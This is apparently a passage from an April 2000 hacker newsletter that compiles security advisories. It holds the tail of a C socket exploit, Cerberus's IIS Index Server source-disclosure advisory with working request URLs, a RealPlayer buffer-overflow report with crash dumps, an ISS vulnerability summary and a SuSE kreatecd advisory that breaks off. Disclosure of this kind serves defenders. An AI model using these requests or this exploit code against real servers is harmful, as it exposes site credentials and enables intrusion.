for(i=0;i<299;i++) { printf("."); fflush(stdout); usleep(99); write(outsocket,"\xff",strlen("\xff")); write(outsocket,"\xbf",strlen("\xff")); write(outsocket,"\xff",strlen("\xe9")); write(outsocket,"\xe3",strlen("\xff")); } printf("]\n[4]- Xploit \n - --(DoNe)-- -\n"); close(outsocket); } /* www.hack.co.za */ @HWA 252.0 PSS:Cerberus Information Security Advisory (CISADV000330) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Cerberus Information Security Advisory (CISADV000330) http://www.cerberus-infosec.co.uk/advisories.shtml Released : 30th March 2000 Name : Index Server (Strike 3!) Affected Systems : Microsoft Internet Information Server Issue : Attackers can gain source of ASP and other pages Author : David Litchfield (mnemonix@globalnet.co.uk) Description *********** The Cerberus Security Team has found a third issue with Microsoft's Index Server that affects any web site running Internet Information Server 4 or 5 with Index Server even if the recent Index Server patch has been installed and even if no .htw files exist on the file system. These systems are at risk from having the source of ASP pages or other files such as the global.asa being revealed. Often these files contain sensitive information such as user IDs and passwords and database source names that are of use to an attacker attempting to break into a site/network. Details ******* If a request is made to http://charon/null.htw?CiWebHitsFile=/default.asp&CiRestriction=none&CiHilit eType=Full only the HTML a user would normally see is returned. However by appending a %20 to the end of the CiWebHitsFile parameter: http://charon/null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHi liteType=Full it is possible to get the full source. Part of the problem exists because 'null.htw' is not a real file that maps to any file on the file system, rather it is a 'virtual file' held in memory so even if there are no real .htw files on the file system IIS boxes with Index Server will still be at risk. Any request made to null.htw is dealt with by webhits.dll. Solution ******** If the functionality provided by webhits is need install Microsoft's patch. If the functionality is not needed, however, simply unmap the .htw extention from webhits.dll using the Internet Service Manager MMC snap-in. A check for this issue already exists in our security scanner, CIS. More details about CIS can be found on our web site: http://www.cerberus-infosec.com Vendor Status ************* Microsoft were alerted to this issue on the 23rd of February and have updated an earlier patch, information about which can be found at http://www.microsoft.com/technet/security/bulletin/ms00-006.asp About Cerberus Information Security, Ltd ******************************** Cerberus Information Security, Ltd, a UK company, are specialists in penetration testing and other security auditing services. They are the developers of CIS (Cerberus' Internet security scanner) available for free from their website: http://www.cerberus-infosec.com To ensure that the Cerberus Security Team remains one of the strongest security audit teams available globally they continually research operating system and popular service software vulnerabilites leading to the discovery of "world first" issues. This not only keeps the team sharp but also helps the industry and vendors as a whole ultimately protecting the end consumer. As testimony to their ability and expertise one just has to look at exactly how many major vulnerabilities have been discovered by the Cerberus Security Team - over 50 to date, making them a clear leader of companies offering such security services. Founded in late 1999, by Mark and David Litchfield, Cerberus Information Security, Ltd are located in London, UK but serves customers across the World. For more information about Cerberus Information Security, Ltd please visit their website or call on +44(0) 181 661 7405 Permission is hereby granted to copy or redistribute this advisory but only in its entirety. Copyright (C) 2000 by Cerberus Information Security, Ltd @HWA 253.0 PSS:Win32 Realplayer 6/7 Buffer Overflow ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Win32 Realplayer 6/7 Buffer Overflow Vulnerability Summary: ---------------------- There is a buffer overflow in the Win32 RealPlayer Basic client, versions 6 and 7. This appears to occur when >299 characters are entered as a 'location' to play, such as http://aaaaa..... with 300 a's. I have tested the MacOS and Linux Realplayer clients and have as yet not found such a vulnerability. Using the HTML "EMBED" tag to embed RealPlayer in a webpage and setting the "AUTOSTART=true" flag, you can force RealPlayer to start automatically, triggering the overflow condition. While I have not taken the time to find the proper entrance point in PNEN3260.DLL (which is what crashes, for example, in RealPlay 6 Basic), it appears that arbitrary code could be exploited simply by *VISITING* a webpage with the malicious embedded RealPlayer tags. (the following example is using RealPlayer v.6 Basic) In full effect, yo: ------------------- For example: RealPlayer Win32 Version 6.0.7.380 Type into "Location" http://aaaaaaaaaaa..... (300 a's) "This program has performed an illegal operation and will be shut down." REALPLAY caused an invalid page fault in module PNEN3260.DLL at 015f:6216d7ca. Registers: EAX=61616161 CS=015f EIP=6216d7ca EFLGS=00010202 EBX=007c0158 SS=0167 ESP=00c6fe70 EBP=00c6fe88 ECX=007c0350 DS=0167 ESI=007c0350 FS=629f EDX=00000001 ES=0167 EDI=007c0350 GS=0000 Bytes at CS:EIP: ff 10 33 d2 f7 77 08 8b 47 04 8b 34 90 85 f6 8d Stack dump: 007c0100 61616161 007c0350 007c0158 007c04d0 78009494 00c6fe9c 6216d853 007c0100 007c0100 007c0100 00c6feac 6218407b 007c0100 007c0100 00c6fed4 Fun. It looks like RealPlayer can be made to execute arbitrary code. It gets worse, using the HTML EMBED tag for RealPlayer you can force a web browser (MSIE in this case) to crash as well. This is left as an exercise for the reader.... Once you embed the RealPlayer in an html page, when Real crashes, it takes Internet Explorer with it... "This program has performed an illegal operation and will be shut down" IEXPLORE caused an invalid page fault in module KERNEL32.DLL at 015f:bff7a379. Registers: EAX=61616161 CS=015f EIP=bff7a379 EFLGS=00010216 EBX=084e5054 SS=0167 ESP=0058d840 EBP=0058d864 ECX=61616161 DS=0167 ESI=000003b4 FS=5ac7 EDX=084d0000 ES=0167 EDI=01615dac GS=0000 Bytes at CS:EIP: 89 41 08 8b 53 04 8b 43 08 89 50 04 8d 04 33 50 Stack dump: 01615dac 00000000 084d000c 084d0000 084e5054 00000000 00000000 00009afb 000084e6 0058d88c bff7a541 084d0000 084e5054 000003b4 00000000 00000001 and the extra bonus of: "This program has performed an illegal operation and will be shut down" IEXPLORE caused an invalid page fault in module PNEN3260.DLL at 015f:621874ba. Registers: EAX=8004004e CS=015f EIP=621874ba EFLGS=00010202 EBX=000000c8 SS=0167 ESP=067dfecc EBP=067dfed4 ECX=08616860 DS=0167 ESI=086163e0 FS=3937 EDX=61616161 ES=0167 EDI=8004004e GS=0000 Bytes at CS:EIP: ff 52 08 8b c7 5f 5e 5d c2 10 00 90 90 90 90 90 Stack dump: 08616b90 085e69f0 067dfeec 6218893b 085034ec 00400050 00400000 00400000 067dff04 621838b4 08616b90 04606568 0000023c 086163e0 067dff38 62183a47 load the malicious page enough times and you get a fun dialog box that just won't go away... unless you reboot. "This program has performed an illegal operation and will be shut down" IEXPLORE caused an invalid page fault in module KERNEL32.DLL at 015f:bff87eb5. Registers: EAX=c00300ec CS=015f EIP=bff87eb5 EFLGS=00010206 EBX=0288fb1c SS=0167 ESP=0284fff0 EBP=0285005c ECX=00000000 DS=0167 ESI=83b934e0 FS=2c0f EDX=83b934e8 ES=0167 EDI=00c1e79c GS=0000 Bytes at CS:EIP: 53 56 57 8b 30 83 7d 10 01 8b 4e 38 89 4d f8 75 Stack dump: etc etc etc. Resolution: ----------- Vendor Notified 3 April 2000, 10:00 AM MST via email. Vendor patch should be forthcoming... ---------------------------------------------------- - Adam Muntner \ Save the Whales! - - adam@alienzoo.com \ Collect Valuable - - Systems Engineer \ Prizes! - - http://www.alienzoo.com \ - ---------------------------------------------------- ----------------------------------------------------- Get free email and alien enlightenment from http://www.alienzoo.com @HWA 254.0 ISS Security summary data sheet ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -----BEGIN PGP SIGNED MESSAGE----- ISS Security Alert Summary April 1, 2000 Volume 5 Number 3 X-Force Vulnerability and Threat Database: http://xforce.iss.net/ To receive these Alert Summaries, subscribe to the ISS Alert mailing list. Send an email to majordomo@iss.net, and within the body of the message type: 'subscribe alert'. _____ Contents 33 Reported Vulnerabilities - windmail-pipe-command - windmail-fileread - simpleserver-exception-dos - linux-domain-socket-dos - linux-gpm-root - outlook-manipulate-hidden-drives - vqserver-dir-traverse - vqserver-passwd-plaintext - iis-chunked-encoding-dos - nav-email-gateway-dos - netscape-server-directory-indexing - mercur-webview-get-dos - officescan-admin-pw-plaintext - officescan-admin-access - linux-kreatecd-path - win-dos-devicename-dos - wmcdplay-bo - nt-registry-permissions - staroffice-scheduler-fileread - staroffice-scheduler-bo - iis-root-enum - mssql-query-abuse - clipart-cil-bo - oracle-installer - linux-rpm-query - thebat-mua-attach - irix-infosrch-fname - linux-dosemu-config - coldfusion-reveal-pathname - netscape-enterprise-command-bo - nmh-execute-code - htdig-remote-read - ie-html-shortcut Risk Factor Key _____ Date Reported: 3/25/00 Vulnerability: windmail-pipe-command Platforms Affected: WindMail 3.0 Risk Factor: High Attack Type: Network Based WindMail is a command-line email messenger for Windows that can create mail forms for web sites from CGI scripts. By issuing an HTTP command that includes the pipe character, an attacker could execute arbitrary commands on the vulnerable system. Reference: Bugtraq Mailing List: "Windmail allow web user get any file" at: http://www.securityfocus.com/templates/archive.pike?list=1&date=2000-03-22&msg=20000325224146.6839.qmail@securityfocus.com _____ Date Reported: 3/25/00 Vulnerability: windmail-fileread Platforms Affected: WindMail 3.0 Risk Factor: Medium Attack Type: Network Based WindMail is a command-line email messenger for Windows that can create mail forms for web sites from CGI scripts. By sending a specially-formatted URL, an attacker could retrieve any ASCII file on the vulnerable system. Reference: Bugtraq Mailing List: "Windmail allow web user get any file" at: http://www.securityfocus.com/templates/archive.pike?list=1&date=2000-03-22&msg=20000325224146.6839.qmail@securityfocus.com _____ Date Reported: 3/25/00 Vulnerability: simpleserver-exception-dos Platforms Affected: SimpleServer WWW 1.03 Risk Factor: Medium Attack Type: Network/Host Based AnalogX SimpleServer WWW is a standard web server for Windows. Version 1.03 is vulnerable to a simple denial of service attack. By requesting a URL with exactly 8 characters following the /cgi-bin/ directory, an attacker can crash the server, requiring it to be rebooted. Reference: Bugtraq Mailing List: "AnalogX SimpleServer 1.03 Remote Crash" at: http://www.securityfocus.com/templates/archive.pike?list=1&msg=web-5645555@post2.rnci.com _____ Date Reported: 3/23/00 Vulnerability: linux-domain-socket-dos Platforms Affected: RedHat Linux (6.1, 6.2) Risk Factor: Medium Attack Type: Network/Host Based The Linux kernel is vulnerable to a denial of service attack due to improper handling of Unix domain sockets. The Unix domain sockets ignore limits set in wmem_max. A local attacker can crash the system by creating successive Unix domain sockets, requiring the system to be rebooted. Reference: Bugtraq Mailing List: "Local Denial-of-Service attack against Linux" at: http://www.securityfocus.com/templates/archive.pike?list=1&msg=20000323175509.A23709@clearway.com _____ Date Reported: 3/22/00 Vulnerability: linux-gpm-root Platforms Affected: Linux running Global Purpose Mouse Risk Factor: Low Attack Type: Host Based The General Purpose Mouse (gpm) package is a tool to enable the mouse for cutting and pasting on consoles, which ships with several Linux distributions. Due to a design flaw in gpm-root, which causes the setgid call to fail, a local user with console access can obtain the group id that is running gpm-root (usually root). Reference: Bugtraq Mailing List: "gpm-root" at: http://www.securityfocus.com/templates/archive.pike?list=1&msg=20000322182143.4498.qmail@securityfocus.com _____ Date Reported: 3/22/00 Vulnerability: outlook-manipulate-hidden-drives Platforms Affected: Microsoft Outlook 98 Risk Factor: Medium Attack Type: Host Based Microsoft Outlook contains a vulnerability that would allow a local user to view hidden drives. In Windows NT, an administrator can hide specific drives using systems policies, so that they cannot be accessed using My Computer, Windows NT Explorer, or the command prompt. However, the Insert File option in Microsoft Outlook reveals the hidden drives, allowing a user to copy, cut, paste, or delete files. Reference: Bugtraq Mailing List: "Hide Drives does not work with OUTLOOK 98" at: http://www.securityfocus.com/templates/archive.pike?list=1&date=2000-03-22&msg=20000322151011.2581.qmail@securityfocus.com _____ Date Reported: 3/21/00 Vulnerability: vqserver-dir-traverse Platforms Affected: vqSoft's vqServer Risk Factor: Medium Attack Type: Network/Host Based The vqServer program by vqSoft is a Java-based personal web server for cross-platform environments. Version 1.9.9 of vqServer, and possibly others, contains a vulnerability that would allow a user to traverse the directories by appending /........../ to a URL, then submitting to the server. This would allow a remote attacker to access any file on the system. Reference: Bugtraq Mailing List: "vqserver /........../" at: http://www.securityfocus.com/templates/archive.pike?list=1&msg=4.1.20000321084646.0095c7f0@olga.swip.net _____ Date Reported: 3/21/00 Vulnerability: vqserver-passwd-plaintext Platforms Affected: vqSoft's vqServer Risk Factor: High Attack Type: Network/Host Based The vqServer program by vqSoft is a Java-based personal web server for cross-platform environments. Version 1.9.9 of vqServer, and possibly others, stores server settings and passwords unencrypted. A remote user could access the password file, via a directory transversal vulnerability in the program, to obtain the administrator password and gain administrative rights to the server. Reference: Bugtraq Mailing List: "vqserver /........../" at: http://www.securityfocus.com/templates/archive.pike?list=1&msg=4.1.20000321084646.0095c7f0@olga.swip.net _____ Date Reported: 3/20/00 Vulnerability: iis-chunked-encoding-dos Platforms Affected: Microsoft Internet Information Server 4.0 Risk Factor: Medium Attack Type: Network/Host Based Microsoft Internet Information Server (IIS) 4.0 contains a vulnerability in its support for chunked encoding transfers, because it does not limit the size of these transfers. An attacker could consume memory on the server by requesting a buffer be reserved for an extremely large amount of data, and then keeping the session open without sending the data. It is possible for an attacker to consume enough memory to cause the server to stop functioning properly. The server could be restored by stopping and restarting the IIS service. Reference: Microsoft Security Bulletin (MS00-018): "Patch Available for 'Chunked Encoding Post' Vulnerability" at: http://www.microsoft.com/technet/security/bulletin/ms00-018.asp _____ Date Reported: 3/17/00 Vulnerability: nav-email-gateway-dos Platforms Affected: Norton AntiVirus for Internet Email Gateways Risk Factor: Medium Attack Type: Network/Host Based Norton AntiVirus for Internet Email Gateways is a SMTP agent that scans email attachments for viruses. It includes an web-based management and administration interface that uses an embedded web server in the product. By sending a long URL to the server, a user will overflow a buffer and crash the program. Reference: Bugtraq Mailing List: "DoS with NAVIEG" at: http://www.securityfocus..com/templates/archive.pike?list=1&msg=s8d1f3e3.036@kib.co.kodiak.ak.us _____ Date Reported: 3/17/00 Vulnerability: netscape-server-directory-indexing Platforms Affected: Netscape Enterprise Server (3.0, 3.51, 3.6) Risk Factor: Medium Attack Type: Network/Host Based Netscape Enterprise Server version 3.x contains a feature called Directory Indexing. This feature, which is enabled by default, displays a directory listing when the a user includes certain tags in a requested URL. This could allow a remote attacker to gain unauthorized access to documents or retrieve lists of file names (such as CGI scripts). Reference: Bugtraq Mailing List: "[SAFER 000317.EXP.1.5] Netscape Enterprise Server and '?wp' tags" at: http://www.securityfocus.com/templates/archive.pike?list=1&msg=38D2173D.24E39DD0@relaygroup.com _____ Date Reported: 3/16/00 Vulnerability: mercur-webview-get-dos Platforms Affected: Mercur WebView WebMail-Client 1.0 Risk Factor: Medium Attack Type: Network/Host Basde MERCUR WebView WebMail-Client 1.0 is an add-on to the MERCUR 3.0 mail server that allows users to read email via a web browser. Due to improper bounds checking in the GET command on port 1080, a user can overflow a buffer and cause the WebMail service to crash. Reference: Underground Security Systems Research: "Local / Remote DoS Attack in MERCUR WebView WebMail-Client 1.0 for Windows 98/NT Vulnerability" at: http://www.ussrback.com/labs36.html _____ Date Reported: 3/16/00 Vulnerability: officescan-admin-pw-plaintext Platforms Affected: Trend Micro OfficeScan Corporate Edition (3.0, 3.11, 3.13, 3.5) Risk Factor: High Attack Type: Network/Host Based Trend Micro OfficeScan 3.51 and below transmits the administrator password over the network in cleartext. OfficeScan is anti-virus software for corporate networks. When configured in the web-based mode on a Windows NT server, an attacker can use a sniffing program to intercept the administrator password. Reference: Bugtraq Mailing List: "OfficeScan TrendMicro: admin for everybody!" at: http://www.securityfocus.com/templates/archive.pike?list=1&msg=38D0E213.5F0AA04@neurocom.com _____ Date Reported: 3/16/00 Vulnerability: officescan-admin-access Platforms Affected: Trend Micro OfficeScan Corporate Edition (3.0, 3.11, 3.13, 3.5) Risk Factor: High Attack Type: Network/Host Based Trend Micro OfficeScan 3.51 and below allows users to perform administrative tasks without authentication. OfficeScan is anti-virus software for corporate networks. When configured in the web-based mode on a Windows NT server, an unauthenticated attacker can use a web browser to access and execute cgi scripts for administration of the software across the network. References: Bugtraq Mailing List: "OfficeScan TrendMicro: admin for everybody!" at: http://www.securityfocus.com/templates/archive.pike?list=1&msg=38D0E213.5F0AA04@neurocom.com Bugtraq Mailing List: "Trend Micro releases Patch for 'OfficeScan Unauthenticated CGI Usage' vulnerability" at: http://www.securityfocus.com/templates/archive.pike?list=1&date=2000-03-22&msg=D129BBE1730AD2118A0300805FC1C2FE0650E8E6@209-76-212-10.trendmicro.com _____ Date Reported: 3/16/00 Vulnerability: linux-kreatecd-path Platforms Affected: SUSE Linux (6.0, 6.1, 6.2, 6.3) Risk Factor: High Attack Type: Host Based The kreatecd package is a graphical front end tool for the cdrecord command that ships with several Linux distributions. The program is installed setuid root and is designed to trust the configuration path to cdrecord. A local attacker could use kreatecd to execute commands as root. Reference: Bugtraq Mailing List: "TESO & C-Skills development advisory -- kreatecd" at: http://www.securityfocus.com/templates/archive.pike?list=1&msg=ine.LNX.3.96.1000316143853.257E-200000@ati12.cs.uni-potsdam.de _____ Date Reported: 3/16/00 Vulnerability: win-dos-devicename-dos Platforms Affected: Windows 95 Windows 98 Risk Factor: Medium Attack Type: Network Based Microsoft Windows 95 and 98 contain a vulnerability in the parsing of file path names. DOS device names, such as COM1 or LPT1, are reserved words and normally cannot be used as file or directory names. If a user attempts to access a file path name that includes one DOS device name, it is treated as invalid, and an error is returned. However, if the path name includes multiple DOS device names, the machine will crash. Reference: Microsoft Security Bulletin (MS00-017): "Patch Available for 'DOS Device in Path Name' Vulnerability" at: http://www.microsoft.com/technet/security/bulletin/ms00-017.asp _____ Date Reported: 3/10/00 Vulnerability: wmcdplay-bo Platforms Affected: wmcdplay Risk Factor: High Attack Type: Host Based The wmcdplay CD player program is vulnerable to a buffer overflow attack. An local attacker can pass an argument to overflow the stack, due to insufficient bounds checking on calls to sprintf. The program is setuid root, allowing an attacker to gain root privileges by overflowing the stack and executing arbitrary code on the system. Reference: BugTraq mailing list: "wmcdplay Buffer Overflow Vulnerability" at: http://www.securityfocus.com/templates/archive.pike?list=1&msg=20000311143230.4C0C01EE8B@lists.securityfocus.com _____ Date Reported: 3/9/00 Vulnerability: nt-registry-permissions Platforms Affected: Microsoft Windows NT 4.0 Risk Factor: High Attack Type: Host Based Windows NT 4.0 including Workstation, Server, and Terminal Server versions, have some registry permissions that are too permissive. A local user with access to the machine could potentially increase their access and cause code to be executed on the machine. Reference: Microsoft Security Bulletin (MS00-008): 'Patch Available for "Registry Permissions' Vulnerability" at: http://www.microsoft.com/technet/security/bulletin/ms00-008.asp _____ Date Reported: 3/9/00 Vulnerability: staroffice-scheduler-fileread Platforms Affected: StarOffice 5.1 Risk Factor: Medium Attack Type: Network Based StarOffice is an office-productivity suite from Sun Microsystems. The StarSchedule server, which controls the group scheduling component of StarOffice, allows an attacker to read files on the server. A remote user can traverse directories using "../" paths to read any file on the server through a browser. Reference: Bugtraq Mailing List: "[SAFER 000309.EXP.1.4] StarScheduler (StarOffice) vulnerabilities" at: http://www.securityfocus.com/templates/archive.pike?list=1&msg=38C68FB8.6F234393@relaygroup.com _____ Date Reported: 3/9/00 Vulnerability: staroffice-scheduler-bo Platforms Affected: StarOffice 5.1 Risk Factor: High Attack Type: Network Based StarOffice is an office-productivity suite from Sun Microsystems. The StarSchedule server, which controls the group scheduling component of StarOffice, is vulnerable to a buffer overflow attack. Sending a large amount of data to the GET command will crash the server, and could allow an attacker to execute arbitrary code as root. Reference: Bugtraq Mailing List: "[SAFER 000309.EXP.1.4] StarScheduler (StarOffice) vulnerabilities" at: http://www.securityfocus.com/templates/archive.pike?list=1&msg=38C68FB8.6F234393@relaygroup.com _____ Date Reported: 3/8/00 Vulnerability: iis-root-enum Platforms Affected: IIS (4.0, 5.0) Risk Factor: Medium Attack Type: Host Based Microsoft Internet Information Server (IIS) 4.0 and 5.0 discloses paths of network shares if configured incorrectly. Files of type IDQ, IDA, and HTX cannot be served from a network share. If a web site administrator attempts to serve these type of files from network shares, a user who attempts to access them will receive an error message that discloses the share path of the file. Reference: BugTraq mailing list: "Microsoft IIS UNC Path Disclosure Vulnerability" at: http://www.securityfocus.com/templates/archive.pike?list=1&msg=007201bf89dc$a18dd2e0$056fee3f@spis.net _____ Date Reported: 3/8/00 Vulnerability: mssql-query-abuse Platforms Affected: Microsoft SQL Server 7.0 Microsoft Data Engine 1.0 Risk Factor: High Attack Type: Network Based Microsoft SQL Server 7.0 and Microsoft Data Engine 1.0 are vulnerable to a remote query problem. The server and engine do not perform sufficient argument validation on particular types of SQL statements. A remote user who has access to submit queries could take actions on the SQL database and possibly perform actions on the server itself. Reference: Microsoft Security Bulletin (MS00-014): "Patch Available for 'SQL Query Abuse' Vulnerability" at: http://www.microsoft.com/technet/security/bulletin/ms00-014.asp _____ Date Reported: 3/6/00 Vulnerability: clipart-cil-bo Platforms Affected: Microsoft Office 2000 Microsoft Works 2000 Risk Factor: High Attack Type: Host Based Microsoft Clip Art Gallery, shipped with such packages as Microsoft Office 2000 and Microsoft Works 2000, contains a possible buffer overflow in the handling of CIL files. The CIL file format is used for downloading additional clips for installation into the gallery. If a CIL file is created with a long field embedded in it, it will overflow the buffer and crash the Clip Gallery, which could result in the execution of arbitrary code. Reference: Microsoft Security Bulletin (MS00-015): "Patch Available for 'Clip Art Buffer Overrun' Vulnerability" at: http://www.microsoft.com/technet/security/bulletin/ms00-015.asp _____ Date Reported: 3/5/00 Vulnerability: oracle-installer Platforms Affected: Oracle 8.1.5i Risk Factor: High Attack Type: Host Based The installation program for Oracle 8.1.5i contains a vulnerability that could allow an attacker to gain root access. The Oracle installation script creates the directory /tmp/orainstall, owned by oracle:dba, mode 711, containing the shell script orainstRoot.sh, mode 777. Then, the installation program stops and asks the user to run the orainstRoot.sh script. An attacker could create a symbolic link from this file to elsewhere on the file system, which could be used to create an .rhosts file and gain access to the root account. A local user could also edit this script to execute arbitrary commands when run by root. Reference: BugTraq Mailing List: "Oracle for Linux Installer Vulnerability" at: http://www.securityfocus.com/templates/archive.pike?list=1&msg=Pine.BSO.4.10.10003051801030.22289-100000@obscurity.org _____ Date Reported: 3/3/00 Vulnerability: linux-rpm-query Platforms Affected: Caldera OpenLinux 2.3 Risk Factor: Medium Attack Type: Network Based Caldera OpenLinux 2.3 contains a vulnerability in the rpm_query CGI. The rpm_query CGI is installed in the /home/httpd/cgi-bin/ directory. A remote user could run this CGI to obtain a listing of the name and version number of every package installed on the system. Reference: BugTraq mailing list: "Caldera OpenLinux 2.3 rpm_query CGI Vulnerability" at: http://www.securityfocus.com/templates/archive.pike?list=1&msg=Pine.LNX.4.21.0003041204220.6797-100000@juggernaut.el8.org _____ Date Reported: 3/2/00 Vulnerability: thebat-mua-attach Platforms Affected: The Bat! Risk Factor: Medium Attack Type: Network Based The Bat! is a mail agent for Windows developed by Rit Research Labs. One of the program's features is that it saves attachments from incoming mail in a specified folder on the system, and adds the file's path to the incoming message as a pseudo-header called X-BAT-FILES. If a message with an attachment is forwarded to someone else, the pseudo-header line remains. This allows the recipient to see the sender's default location for all saved email attachments. Reference: BugTraq Mailing List: "Rit Research Labs 'The Bat!' X-BAT-FILES Vulnerabilities" at: http://www.securityfocus.com/templates/archive.pike?list=1&date=2000-03-22&msg=200003021443.RAA31070@adm.sci-nnov.ru _____ Date Reported: 3/2/00 Vulnerability: irix-infosrch-fname Platforms Affected: IRIX 6.5 Risk Factor: High Attack Type: Network/Host Based InfoSearch is a tool distributed by SGI that converts man pages, release notes, and other documents into HTML format for reading on the Internet. It contains a vulnerability in the method it uses to parse input for the fname variable that would allow a remote attacker to execute arbitrary commands on the web server. Reference: Bugtraq Mailing List: "infosrch.cgi vulnerability (IRIX 6.5)" at: http://www.securityfocus.com/templates/archive.pike?list=1&msg=Pine.LNX.4.10.10003021059360.21162-100000@inetarena.com _____ Date Reported: 3/2/00 Vulnerability: linux-dosemu-config Platforms Affected: Corel Linux 1.0 Risk Factor: High Attack Type: Host Based Corel Linux 1.0 contains a vulnerability in the configuration of the dosemu package. Dosemu is a DOS emulator that allows DOS programs to run on Linux. A local user can use the system.com binary to execute commands as root. Reference: Bugtraq Mailing List: "Corel Linux 1.0 dosemu default configuration: Local root vuln" at: http://www.securityfocus.com/templates/archive.pike?list=1&msg=200003020436.PAA20168@jawa.chilli.net.au _____ Date Reported: 3-01-2000 Vulnerability: coldfusion-reveal-pathname Platforms Affected: ColdFusion 4.01 Risk Factor: Low Attack Type: Network Based ColdFusion 4.01 contains a vulnerability that can reveal path names to cfm pages. When a remote user makes an HTTP request to a cfm page, the server will return an error message that reveals the full path name to the file. Reference: NTBUGTRAQ Mailing List: "ColdFusions application.cfm shows full path" at: http://www.ntbugtraq.com/default.asp?pid=36&sid=1&A2=ind0003&L=ntbugtraq&F=&S=&P=435 _____ Date Reported: 3-01-2000 Vulnerability: netscape-enterprise-command-bo Platforms Affected: Netscape Enterprise Server (3.6) Risk Factor: High Attack Type: Network Based Netscape Enterprise Server 3.6 web server for Windows NT 4.0 contains a buffer overflow in commands issued to the server. If a remote user issues a command followed by a large quantity of data, the server will crash. It is possible for the user to then execute arbitrary code. References: S.A.F.E.R. Security Bulletin SAFER 000229.EXP.1.3: "Buffer Overflow in Netscape Enterprise Server" at: http://www.safermag.com/advisories/0006.html BUGTRAQ Mailing List: "[SAFER 000229.EXP.1.3] Remote buffer overflow in Netscape Enterprise Server 3.6 SP2" at: http://www.securityfocus.com/templates/archive.pike?list=1&date=2000-02-29&msg=38BC065A.E6AE7002@relaygroup.com _____ Date Reported: 3/1/00 Vulnerability: nmh-execute-code Platforms Affected: Debian Linux 2.1 Risk Factor: High Attack Type: Network Based The nmh package does not properly check incoming mail message headers. A remote attacker could send specially-crafted MIME message headers that would cause mhshow to execute arbitrary code. Reference: Debian Security Advisory: "New version of nmh released" at: http://www.debian.org/Lists-Archives/debian-security-announce-00/msg00005.html _____ Date Reported: 3/1/00 Vulnerability: htdig-remote-read Platforms Affected: Unix running htdig 3.1.5 Risk Factor: Low Attack Type: Network Based The ht://dig program is a web indexing and searching system for intranets and small domains. Due to improper validation of form input, a remote attacker could pass a variable to the htsearch CGI that would allow the attacker to read any file on the machine that is accessible by the htdig user. Reference: Debian Security Advisory: "New version of htdig released" at: http://www.debian.org/Lists-Archives/debian-security-announce-00/msg00004.html _____ Date Reported: 3/1/00 Vulnerability: ie-html-shortcut Platforms Affected: Microsoft Internet Explorer (5.0, 5.0.1) Risk Factor: High Attack Type: Network/Host Based Microsoft Internet Explorer 5 uses window.showHelp() to open HTML help files (.chm). If these files contain a shortcut to an executable, it will be run with the privileges of the current user. An attacker could create a .chm file with a link to an executable and cause it to execute on the victim's machine. Reference: Bugtraq Mailing List: "IE 5.x allows executing arbitrary programs using .chm files" at: http://www.securityfocus.com/templates/archive.pike?list=1&msg=38BD37F6.C9B3F8B@nat.bg _____ Risk Factor Key: High Any vulnerability that provides an attacker with immediate access into a machine, gains superuser access, or bypasses a firewall. Example: A vulnerable Sendmail 8.6.5 version that allows an intruder to execute commands on mail server. Medium Any vulnerability that provides information that has a high potential of giving system access to an intruder. Example: A misconfigured TFTP or vulnerable NIS server that allows an intruder to get the password file that could contain an account with a guessable password. Low Any vulnerability that provides information that potentially could lead to a compromise. Example: A finger that allows an intruder to find out who is online and potential accounts to attempt to crack passwords via brute force methods. _____ Permission is hereby granted for the redistribution of this Alert Summary electronically. It is not to be edited in any way without express consent of the X-Force. If you wish to reprint the whole or any part of this Alert Summary in any other medium excluding electronic medium, please e-mail xforce@iss.net for permission. Disclaimer The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk. X-Force PGP Key available at: http://xforce.iss.net/sensitive.php3 as well as on MIT's PGP key server and PGP.com's key server. Please send suggestions, updates, and comments to: X-Force of Internet Security Systems, Inc. About Internet Security Systems Internet Security Systems (ISS) is the leading global provider of security management solutions for the Internet. By providing industry-leading SAFEsuite* security software, ePatrol* remote managed security services, and strategic consulting and education offerings, ISS is a trusted security provider to its customers and partners, protecting digital assets and ensuring safe and uninterrupted e-business. ISS' security management solutions protect more than 5,500 customers worldwide including 21 of the 25 largest U.S. commercial banks, 10 of the largest telecommunications companies and over 35 government agencies. Founded in 1994, ISS is headquartered in Atlanta, GA, with additional offices throughout North America and international operations in Asia, Australia, Europe, Latin America and the Middle East. For more information, visit the Internet Security Systems web site at www.iss.net or call 888-901-7477. Copyright (c) 2000 by Internet Security Systems, Inc. -----BEGIN PGP SIGNATURE----- Version: 2.6.3a Charset: noconv iQCVAwUBOOjlnzRfJiV99eG9AQHSOgQAj9D2ufzmwt8RyBRDZLzDCtdfTcG9KiaZ AbQfghGaav5IlYrSUEj2GFHj1KeLb2o8OCCnzVo5T1YFoIKC3L6ZxQ9q0Gsi2Pfv KXYGtYmNcOzQ5WIjUuBm1T2/ZXcL3cPYkfcMzyIKp0iddhx7noxuHJOffP1QTzm6 /hbYgL+fum8= =bxur -----END PGP SIGNATURE----- @HWA 255.0 PSS: suse kreatecd root compromise ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -----BEGIN PGP SIGNED MESSAGE----- ______________________________________________________________________________ SuSE Security Announcement Package: kreatecd < 0.3.8b Date: Wed, 5 Apr 2000 20:00:12 GMT Affected SuSE versions: 6.4 Vulnerability Type: local root compromise SuSE default package: no Other affected systems: all unix systems using kreatecd ______________________________________________________________________________ A security hole was discovered in the package mentioned above. Please update as soon as possible or disable the service if you are using this software on your SuSE Linux installation(s). Other Linux distributions or operating systems might be affected as well, please contact your vendor for information about this issue. Please note that we provide this information on an "as-is" basis only. There is no warranty whatsoever and no liability for any direct, indirect or incidental damage arising from this information or the installation of the update package. _____________________________________________________________________________ 1. Problem Description kreatecd is a KDE tool used to burn cd-roms. An exploitable buffer overflow was found in this tool. 2. Impact Local users may gain root privilige. 3. Solution Update the package from our FTP server, or remove the suid bit from this tool. ("chmod u-s /opt/kde/bin/kreatecd") ______________________________________________________________________________ Please verify these md5 checksums of the updates before installing: 742ed57b8bfb022d4e3755e417612272 ftp://ftp.suse.com/pub/suse/axp/update/6.4/kpa1/kreatecd-0.3.8b-0.alpha.rpm 